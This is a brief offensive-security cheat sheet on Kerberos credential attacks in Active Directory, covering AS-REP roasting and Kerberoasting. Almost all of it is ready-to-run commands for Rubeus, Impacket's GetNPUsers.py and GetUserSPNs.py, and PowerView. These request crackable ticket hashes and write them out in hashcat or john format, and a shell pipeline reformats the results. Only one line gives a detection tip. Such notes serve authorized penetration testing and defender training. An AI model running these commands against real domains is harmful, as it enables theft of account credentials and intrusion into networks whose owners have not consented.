Roasting

AS-REP Roast

Monitoring tip

Check for event 4768 on the DC and 0x17 as additional info.

Check for all users in current domain

Rubeus.exe asreproast [/format:<hashcat|john>] [-outputfile <out>]
python GetNPUsers.py <fqdn>/<user>:<password> -request -format <hashcat|john> -outputfile <out>

Check for a list of users

python GetNPUsers.py <fqdn>/ -usersfile <users.txt> -format <hashcat|john> -outputfile <out>

Kerberoasting

info

john --format=krb5tgs

PowerView

Invoke-Kerberoast -OutputFormat <hashcat|john>| fl

Rubeus and tgtdeleg function

Rubeus.exe kerberoast [/spn:"<MSSQLSvc>/<sql01.domain.local>"] [/user:<user>] [/tgtdeleg] [/nowrap]

cat kerb.raw | grep -v "^$" | egrep -v "SamAccountName|DistinguishedName|ServicePrincipalName|PwdLastSet|Supported.ETypes" | tr -d "                             " | cut -d ":" -f 2 | sed 's/\$krb5tgs/#\$krb5tgs/g' | tr -d "\n" | tr "#" "\n"

Python

python GetUserSPNs.py <fqdn>/<user>:<password> -request -outputfile <out>

AS-REP Roast​

Kerberoasting​

AS-REP Roast

Kerberoasting